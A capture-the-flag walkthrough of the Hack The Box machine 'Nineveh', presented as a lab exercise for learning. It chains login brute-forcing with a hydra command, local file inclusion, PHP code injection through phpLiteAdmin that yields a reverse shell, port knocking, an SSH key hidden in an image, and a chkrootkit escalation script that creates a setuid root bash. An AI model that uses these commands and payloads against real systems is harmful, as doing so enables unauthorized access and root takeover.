Nineveh is a medium Linux box that can be exploited by brute-forcing login credentials. This will lead you to a page that is vulnerable to a LFI vulnerability. Login credentials can then be brute-forced to authenticate to the phpLiteAdmin software after which you can create a new database with malicious php code that gets executed when used in combination with the LFI. A private key was found inside one of the images which can be combined with a port knock to obtain a lower privileged SSH shell. A cronjob is found which indicates chkrootkit is used, a public exploit was used to obtain a root shell.
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.94.12 PORT STATE SERVICE 80/tcp open http 443/tcp open https
The user is presented with the following:
Gobuster found the following locations:
http://10.129.94.12/department/login.php https://10.129.94.36/db https://10.129.94.36/secure_notes/
The first page was vulnerable to username enumeration:
It also shows this comment in the response:
@admin! MySQL is been installed.. please fix the login page! ~amrois
Since you know the username you can brute-force the password. In this case hydra was used as it is relatively easy to configure and it is very fast. The following command was used to brute-force the login form:
In only 1 minute, Hydra managed to find the password:
[http-post-form] host: 10.129.94.12 login: admin password: 1q2w3e4r5t
After authenticating, the following page is shown:
This shows several hints. It also shows the following notes page: http://10.129.94.12/department/manage.php?notes=files/ninevehNotes.txt
This turned out to be vulnerable to a LFI inclusion vulnerability. The following request was issued:
The passwd file was retrieved:
It was attempted to pull the user directly:
However, this gives an error that the filename is too long. Switching back to the other directories from gobuster, the following page was found:
Authenticating with the previously discovered credentials does not work. Searchsploit shows the following available exploits:
However, all of these are authenticated. Therefore, hydra was used again with the following command:
hydra -P /usr/share/wordlists/rockyou.txt 10.129.94.12 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password."
Hydra found it again:
Lets go back to the following exploit form searchsploit to get RCE as an authenticated user.
A database was created with the name ninevehNotes.txt.rce.php. The first part had to be in the DB name otherwise the LFI will keep displaying file name too long. Also, please note that you can’t use single quotes in the php code as this will mess with the SQL. In this case, it fetches a file named shell.txt which consists of a php reverse shell.
Then go to:
This will land you a reverse shell.
Linpeas found a mail:
www-data@nineveh:/tmp$ cat /var/mail/amrois From firstname.lastname@example.org Fri Jun 23 14:04:19 2017 Return-Path: [email@example.com](mailto:firstname.lastname@example.org) X-Original-To: amrois Delivered-To: email@example.com Received: by nineveh.htb (Postfix, from userid 1000) id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT) To: firstname.lastname@example.org From: email@example.com Subject: Another Important note! Message-Id: [20170623190419.D289B2E3587@nineveh.htb](mailto:20170623190419.D289B2E3587@nineveh.htb) Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT) Amrois! please knock the door next time! 571 290 911
Note that the text gives an indication of a port knocking possibility. Check the config with:
www-data@nineveh:/home/amrois$ cat /etc/knockd.conf [options] logfile = /var/log/knockd.log interface = ens160 [openSSH] sequence = 571, 290, 911 seq_timeout = 5 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 911,290,571 seq_timeout = 5 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
To open port 22 you can execute the following command:
knock 10.129.94.36 571, 290, 911
When you re-run Nmap you will see that it opened it:
nmap -p22 10.129.94.36 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 15:31 CET Nmap scan report for 10.129.94.36 Host is up (0.011s latency). PORT STATE SERVICE 22/tcp open ssh
However, when using SSH to authenticate, you are prompted for a password. It took a while to figure this out but go back to the notes from gobuster. The only page that was not checked so far is:
You can go to this directory locally:
www-data@nineveh:/home/amrois$ locate secure_notes /var/www/ssl/secure_notes /var/www/ssl/secure_notes/index.html /var/www/ssl/secure_notes/nineveh.png
Then run strings on all those files, you will find a private key in the .png one. Copy this over to a file on your localhost and authenticate over SSH with:
ssh -i nineveh-privatekey firstname.lastname@example.org
This gives you a lower privileged shell and you can cat user.txt.
Run linpeas again, it will find the following:
Lets check that file:
amrois@nineveh:~$ strings /usr/sbin/report-reset.sh #!/bin/bash rm -rf /report/*.txt
Let’s check that directory:
amrois@nineveh:/report$ ls -la total 24 drwxr-xr-x 2 amrois amrois 4096 Feb 8 08:41 . drwxr-xr-x 24 root root 4096 Jan 29 03:34 .. -rw-r--r-- 1 amrois amrois 4838 Feb 8 08:40 report-21-02-08:08:40.txt -rw-r--r-- 1 amrois amrois 4838 Feb 8 08:41 report-21-02-08:08:41.txt [...]
When you throw some of the contect into google you will find a lot of information regarding chkrootkit. Searchsploit has the following modules for this:
Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt
You can create a file named update and make sure it’s executable. I used the following contents:
#!/bin/bash cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash
When the cronjob is run it will create the file rootbash after which you can execute this to get a rootshell:
This was a really fun box. Obtaining the private key was rather tricky but apart from that it was relativiely straightforward and learned a lot from doing this. Hope you enjoyed this walkthrough!